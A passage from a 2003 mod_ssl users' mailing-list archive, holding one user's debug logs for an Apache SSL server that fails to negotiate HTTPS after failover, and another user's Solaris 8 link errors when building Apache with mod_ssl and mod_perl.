10:32:26 01224] [info]  Init: Reinitializing OpenSSL=20
library
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session =
Cache=20
(DBM) Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] =

[info]  Init: Seeding PRNG with 136 bytes of =
entropy
[17/Mar/2003=20
10:32:26 01224] [info]  Init: Configuring temporary RSA private =
keys=20
(512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: =
Configuring=20
temporary DH parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224]=20
[info]  Init: Initializing (virtual) servers for =
SSL
[17/Mar/2003=20
10:32:26 01224] [info]  Init: Configuring server mytest.com.au:443 =
for SSL=20
protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 =
01224]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:26 01224] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key
[17/Mar/2003 =
10:32:27=20
00912] [info]  Server: Apache/1.3.26, Interface: mod_ssl/2.8.10, =
Library:=20
OpenSSL/0.9.6d
[17/Mar/2003 10:32:27 00912] [warn]  You are =
using=20
mod_ssl under Win32. This combination is *NOT* officially supported. Use =
it at=20
your own risk!
[17/Mar/2003 10:32:27 00912] [info]  Init: 1st =
startup=20
round (still not detached)
[17/Mar/2003 10:32:27 00912] [info]  =
Init:=20
Initializing OpenSSL library
[17/Mar/2003 10:32:27 00912] =
[info]  Init:=20
Loading certificate & private key of SSL-aware server=20
mytest.com.au:443
[17/Mar/2003 10:32:27 00912] [trace] Init:=20
(mytest.com.au:443) unencrypted RSA private key - pass phrase not=20
required
[17/Mar/2003 10:32:27 00912] [info]  Init: Seeding PRNG =
with=20
136 bytes of entropy
[17/Mar/2003 10:32:27 00912] [info]  Init:=20
Generating temporary RSA private keys (512/1024 bits)
[17/Mar/2003 =
10:32:28=20
00912] [info]  Init: Configuring temporary DH parameters (512/1024=20
bits)
[17/Mar/2003 10:32:28 00912] [trace] Inter-Process Session =
Cache (DBM)=20
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:28 00912] =
[info] =20
Init: Seeding PRNG with 136 bytes of entropy
[17/Mar/2003 10:32:28 =
00912]=20
[info]  Init: Configuring temporary RSA private keys (512/1024=20
bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring =
temporary=20
DH parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] =
[info]  Init:=20
Initializing (virtual) servers for SSL
[17/Mar/2003 10:32:28 00912]=20
[info]  Init: Configuring server mytest.com.au:443 for SSL=20
protocol
[17/Mar/2003 10:32:28 00912] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:28 =
00912]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:28 00912] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:28 00912] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:28 00912] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:28 00912] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:28 00912] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key


 


 


 


 


Regards,=20






Vince=20



------_=_NextPart_001_01C2EC16.706DADDC--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 00:49:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 192482AA051; Mon, 17 Mar 2003 00:49:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rdsl_mlb_mx1.requestdsl.com.au (rdsl-mlb-mx1.requestdsl.com.au [202.138.194.10])
	by master.modssl.org (Postfix) with ESMTP id 050A42AA04B
	for ; Mon, 17 Mar 2003 00:49:43 +0100 (CET)
content-class: urn:content-classes:message
Subject:  SSL aware server not encrypting
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2EC16.867902C3"
Date: Mon, 17 Mar 2003 10:48:20 +1100
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B59014EA659@rdsl_mlb_mx1.requestdsl.com.au>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL aware server not encrypting
Thread-Index: AcLsFnAthK87keFgQgy/BFC0T0qfEwAAAq2g
From: "Vince Montuoro" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2EC16.867902C3
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

    I 've had this problem for a while, i have two servers, Only one is =
publiccly visible at any one time,  when the first goes down i (should =
be) enable the second one on our firewall by changeing the nat.  BUT on =
the second server apache never seems to negoiate a secure connection!
=20
by this i mean "https" will not work, but   =
http://....:443 will work.
=20
Both servers have an identical build and config structure.
=20
For you help i have include the ssl log level (debug)
=20
[17/Mar/2003 10:32:25 01224] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10, Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:25 01224] [warn]  You are using mod_ssl under Win32. =
This combination is *NOT* officially supported. Use it at your own risk!
[17/Mar/2003 10:32:25 01224] [info]  Init: 1st startup round (still not =
detached)
[17/Mar/2003 10:32:25 01224] [info]  Init: Initializing OpenSSL library
[17/Mar/2003 10:32:25 01224] [info]  Init: Loading certificate & private =
key of SSL-aware server mytest.com.au:443
[17/Mar/2003 10:32:25 01224] [trace] Init: (mytest.com.au:443) =
unencrypted RSA private key - pass phrase not required
[17/Mar/2003 10:32:25 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:25 01224] [info]  Init: Generating temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:25 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key
[17/Mar/2003 10:32:26 01224] [info]  Init: 2nd startup round (already =
detached)
[17/Mar/2003 10:32:26 01224] [info]  Init: Reinitializing OpenSSL =
library
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key
[17/Mar/2003 10:32:27 00912] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10, Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:27 00912] [warn]  You are using mod_ssl under Win32. =
This combination is *NOT* officially supported. Use it at your own risk!
[17/Mar/2003 10:32:27 00912] [info]  Init: 1st startup round (still not =
detached)
[17/Mar/2003 10:32:27 00912] [info]  Init: Initializing OpenSSL library
[17/Mar/2003 10:32:27 00912] [info]  Init: Loading certificate & private =
key of SSL-aware server mytest.com.au:443
[17/Mar/2003 10:32:27 00912] [trace] Init: (mytest.com.au:443) =
unencrypted RSA private key - pass phrase not required
[17/Mar/2003 10:32:27 00912] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:27 00912] [info]  Init: Generating temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [trace] Inter-Process Session Cache (DBM) =
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:28 00912] [info]  Init: Seeding PRNG with 136 bytes =
of entropy
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary RSA =
private keys (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring temporary DH =
parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Initializing (virtual) =
servers for SSL
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring server =
mytest.com.au:443 for SSL protocol
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) Creating =
new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring permitted SSL ciphers =
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring client authentication
[17/Mar/2003 10:32:28 00912] [trace] CA certificate: /O=3DVeriSign Trust =
Network/OU=3DVeriSign, Inc./OU=3DVeriSign International Server CA - =
Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 =
VeriSign
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring RSA server certificate
[17/Mar/2003 10:32:28 00912] [info]  Init: (mytest.com.au:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[17/Mar/2003 10:32:28 00912] [trace] Init: (mytest.com.au:443) =
Configuring RSA server private key

=20
=20
=20
=20
Regards,=20
  =20
Vince=20

------_=_NextPart_001_01C2EC16.867902C3
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









    I=20
've had this problem for a while, i have two servers, Only one is =
publiccly=20
visible at any one time,  when the first goes down i (should be) =
enable the=20
second one on our firewall by changeing the nat.  BUT on the second =
server=20
apache never seems to negoiate a secure connection!


 


by =
this i mean=20
"https" will not work, but http://....:443 will work.


 


Both =
servers have an=20
identical build and config structure.


 


For =
you help i have=20
include the ssl log level (debug)


 


[17/Mar/2003=20
10:32:25 01224] [info]  Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.10,=20
Library: OpenSSL/0.9.6d
[17/Mar/2003 10:32:25 01224] [warn]  You =
are=20
using mod_ssl under Win32. This combination is *NOT* officially =
supported. Use=20
it at your own risk!
[17/Mar/2003 10:32:25 01224] [info]  Init: =
1st=20
startup round (still not detached)
[17/Mar/2003 10:32:25 01224] =
[info] =20
Init: Initializing OpenSSL library
[17/Mar/2003 10:32:25 01224] =
[info] =20
Init: Loading certificate & private key of SSL-aware server=20
mytest.com.au:443
[17/Mar/2003 10:32:25 01224] [trace] Init:=20
(mytest.com.au:443) unencrypted RSA private key - pass phrase not=20
required
[17/Mar/2003 10:32:25 01224] [info]  Init: Seeding PRNG =
with=20
136 bytes of entropy
[17/Mar/2003 10:32:25 01224] [info]  Init:=20
Generating temporary RSA private keys (512/1024 bits)
[17/Mar/2003 =
10:32:25=20
01224] [info]  Init: Configuring temporary DH parameters (512/1024=20
bits)
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session =
Cache (DBM)=20
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: Seeding PRNG with 136 bytes of entropy
[17/Mar/2003 10:32:26 =
01224]=20
[info]  Init: Configuring temporary RSA private keys (512/1024=20
bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: Configuring =
temporary=20
DH parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224] =
[info]  Init:=20
Initializing (virtual) servers for SSL
[17/Mar/2003 10:32:26 01224]=20
[info]  Init: Configuring server mytest.com.au:443 for SSL=20
protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 =
01224]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:26 01224] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key
[17/Mar/2003 =
10:32:26=20
01224] [info]  Init: 2nd startup round (already =
detached)
[17/Mar/2003=20
10:32:26 01224] [info]  Init: Reinitializing OpenSSL=20
library
[17/Mar/2003 10:32:26 01224] [trace] Inter-Process Session =
Cache=20
(DBM) Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:26 01224] =

[info]  Init: Seeding PRNG with 136 bytes of =
entropy
[17/Mar/2003=20
10:32:26 01224] [info]  Init: Configuring temporary RSA private =
keys=20
(512/1024 bits)
[17/Mar/2003 10:32:26 01224] [info]  Init: =
Configuring=20
temporary DH parameters (512/1024 bits)
[17/Mar/2003 10:32:26 01224]=20
[info]  Init: Initializing (virtual) servers for =
SSL
[17/Mar/2003=20
10:32:26 01224] [info]  Init: Configuring server mytest.com.au:443 =
for SSL=20
protocol
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:26 =
01224]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:26 01224] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:26 01224] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:26 01224] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:26 01224] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:26 01224] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key
[17/Mar/2003 =
10:32:27=20
00912] [info]  Server: Apache/1.3.26, Interface: mod_ssl/2.8.10, =
Library:=20
OpenSSL/0.9.6d
[17/Mar/2003 10:32:27 00912] [warn]  You are =
using=20
mod_ssl under Win32. This combination is *NOT* officially supported. Use =
it at=20
your own risk!
[17/Mar/2003 10:32:27 00912] [info]  Init: 1st =
startup=20
round (still not detached)
[17/Mar/2003 10:32:27 00912] [info]  =
Init:=20
Initializing OpenSSL library
[17/Mar/2003 10:32:27 00912] =
[info]  Init:=20
Loading certificate & private key of SSL-aware server=20
mytest.com.au:443
[17/Mar/2003 10:32:27 00912] [trace] Init:=20
(mytest.com.au:443) unencrypted RSA private key - pass phrase not=20
required
[17/Mar/2003 10:32:27 00912] [info]  Init: Seeding PRNG =
with=20
136 bytes of entropy
[17/Mar/2003 10:32:27 00912] [info]  Init:=20
Generating temporary RSA private keys (512/1024 bits)
[17/Mar/2003 =
10:32:28=20
00912] [info]  Init: Configuring temporary DH parameters (512/1024=20
bits)
[17/Mar/2003 10:32:28 00912] [trace] Inter-Process Session =
Cache (DBM)=20
Expiry: old: 0, new: 0, removed: 0
[17/Mar/2003 10:32:28 00912] =
[info] =20
Init: Seeding PRNG with 136 bytes of entropy
[17/Mar/2003 10:32:28 =
00912]=20
[info]  Init: Configuring temporary RSA private keys (512/1024=20
bits)
[17/Mar/2003 10:32:28 00912] [info]  Init: Configuring =
temporary=20
DH parameters (512/1024 bits)
[17/Mar/2003 10:32:28 00912] =
[info]  Init:=20
Initializing (virtual) servers for SSL
[17/Mar/2003 10:32:28 00912]=20
[info]  Init: Configuring server mytest.com.au:443 for SSL=20
protocol
[17/Mar/2003 10:32:28 00912] [trace] Init: =
(mytest.com.au:443)=20
Creating new SSL context (protocols: SSLv2)
[17/Mar/2003 10:32:28 =
00912]=20
[trace] Init: (mytest.com.au:443) Configuring permitted SSL ciphers=20
[!EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MED=
IUM:+LOW:+SSLv2:+EXP:+eNULL]
[17/Mar/2003=20
10:32:28 00912] [trace] Init: (mytest.com.au:443) Configuring client=20
authentication
[17/Mar/2003 10:32:28 00912] [trace] CA certificate:=20
/O=3DVeriSign Trust Network/OU=3DVeriSign, Inc./OU=3DVeriSign =
International Server CA=20
- Class 3/OU=3Dwww.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97=20
VeriSign
[17/Mar/2003 10:32:28 00912] [trace] Init: =
(mytest.com.au:443)=20
Configuring RSA server certificate
[17/Mar/2003 10:32:28 00912] =
[info] =20
Init: (mytest.com.au:443) RSA server certificate enables Server Gated=20
Cryptography (SGC)
[17/Mar/2003 10:32:28 00912] [trace] Init:=20
(mytest.com.au:443) Configuring RSA server private key


 


 


 


 


Regards,=20



 
 




Vince=20



------_=_NextPart_001_01C2EC16.867902C3--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 15:52:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BEE0C2AA035; Mon, 17 Mar 2003 15:52:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.cse.psu.edu (psuvax1.cse.psu.edu [130.203.4.6])
	by master.modssl.org (Postfix) with ESMTP id 52B8C2AA01A
	for ; Mon, 17 Mar 2003 15:52:15 +0100 (CET)
Received: from corona.cse.psu.edu (corona.cse.psu.edu [130.203.4.52])
	by mail.cse.psu.edu (CSE Mail Server) with ESMTP id 14AAD19A06
	for ; Mon, 17 Mar 2003 09:52:11 -0500 (EST)
Received: by corona.cse.psu.edu (Postfix Null Client, from userid 2711)
	id 32E213973A; Mon, 17 Mar 2003 09:52:09 -0500 (EST)
Subject: Apache/mod_ssl not compiling, Solaris 8
To: modssl-users@modssl.org
Date: Mon, 17 Mar 2003 09:52:09 -0500 (EST)
From: "Nathan Coraor" 
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20030317145209.32E213973A@corona.cse.psu.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nathan Coraor" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I'm attempting to compile Apache 1.3.27 + mod_perl 1.27 + mod_ssl
2.8.12-1.3.27 under Solaris 8, and it's failing when linking.  I've got
OpenSSL 0.9.7a compiled for 'solaris64-sparcv9-cc'.

The output's here:

cc  -DSOLARIS2=280 -DMOD_SSL=208112 -DMOD_PERL -DUSE_PERL_SSI -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -DEAPI -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 `./apaci` -L/usr/local/ssl/lib   \
      -o httpd buildmark.o modules.o modules/ssl/libssl.a modules/perl/libperl.a modules/standard/libstandard.a main/libmain.a ./os/unix/libos.a ap/libap.a    -lsocket -lnsl -lpthread  -lssl -lcrypto    -L/usr/local/lib -L/opt/SUNWspro/WS6U1/lib  /usr/local/lib/perl5/5.6.1/sun4-solaris/auto/DynaLoader/DynaLoader.a -L/usr/local/lib/perl5/5.6.1/sun4-solaris/CORE -lperl -lsocket -lnsl -ldl -lm -lc  -ldl
ld: warning: file /usr/local/ssl/lib/libssl.a(s2_srvr.o): wrong ELF class: ELFCLASS64
ld: warning: file /usr/local/ssl/lib/libcrypto.a(bn_lib.o): wrong ELF class: ELFCLASS64
Undefined                       first referenced
 symbol                             in file
d2i_SSL_SESSION                     modules/ssl/libssl.a(ssl_scache_dbm.o)
SSL_get_verify_mode                 modules/ssl/libssl.a(ssl_engine_kernel.o)
SSL_library_init                    modules/ssl/libssl.a(ssl_engine_init.o)

... snip ... (a -lot- of undefined symbols here)

SSL_accept                          modules/ssl/libssl.a(ssl_engine_kernel.o)
X509_NAME_oneline                   modules/ssl/libssl.a(ssl_engine_init.o)
ERR_get_error                       modules/ssl/libssl.a(ssl_engine_log.o)
ld: fatal: Symbol referencing errors. No output written to httpd
make[3]: *** [target_static] Error 1
make[3]: Leaving directory `/usr/local/src/apache/apache_1.3.27/src'
make[2]: *** [build-std] Error 2
make[2]: Leaving directory `/usr/local/src/apache/apache_1.3.27'
make[1]: *** [build] Error 2
make[1]: Leaving directory `/usr/local/src/apache/apache_1.3.27'
make: *** [apaci_httpd] Error 2

Thanks in advance,
--nate

--------
nathan coraor
cse lab support
nate@cse.psu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 17:41:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 792FD2AA035; Mon, 17 Mar 2003 17:41:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id 123492AA01A
	for ; Mon, 17 Mar 2003 17:41:22 +0100 (CET)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.10.2+Sun/8.10.2) id h2HGdaW13073
	for ; Mon, 17 Mar 2003 17:39:36 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAApsaaIz; Mon, 17 Mar 03 17:39:34 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id h2HGfGM15197;
	Mon, 17 Mar 2003 17:41:16 +0100 (MET)
Message-ID: <3E75FAA7.4070808@trustcenter.de>
Date: Mon, 17 Mar 2003 17:41:11 +0100
From: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache/mod_ssl not compiling, Solaris 8
References: <20030317145209.32E213973A@corona.cse.psu.edu>
In-Reply-To: <20030317145209.32E213973A@corona.cse.psu.edu>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms010205070001060105020301"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms010205070001060105020301
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Nathan,

Nathan Coraor wrote:
> Hi all,
> 
> I'm attempting to compile Apache 1.3.27 + mod_perl 1.27 + mod_ssl
> 2.8.12-1.3.27 under Solaris 8, and it's failing when linking.  I've got
> OpenSSL 0.9.7a compiled for 'solaris64-sparcv9-cc'.
> 
> The output's here:
> 
> cc  -DSOLARIS2=280 -DMOD_SSL=208112 -DMOD_PERL -DUSE_PERL_SSI -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -DEAPI -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 `./apaci` -L/usr/local/ssl/lib   \
>       -o httpd buildmark.o modules.o modules/ssl/libssl.a modules/perl/libperl.a modules/standard/libstandard.a main/libmain.a ./os/unix/libos.a ap/libap.a    -lsocket -lnsl -lpthread  -lssl -lcrypto    -L/usr/local/lib -L/opt/SUNWspro/WS6U1/lib  /usr/local/lib/perl5/5.6.1/sun4-solaris/auto/DynaLoader/DynaLoader.a -L/usr/local/lib/perl5/5.6.1/sun4-solaris/CORE -lperl -lsocket -lnsl -ldl -lm -lc  -ldl
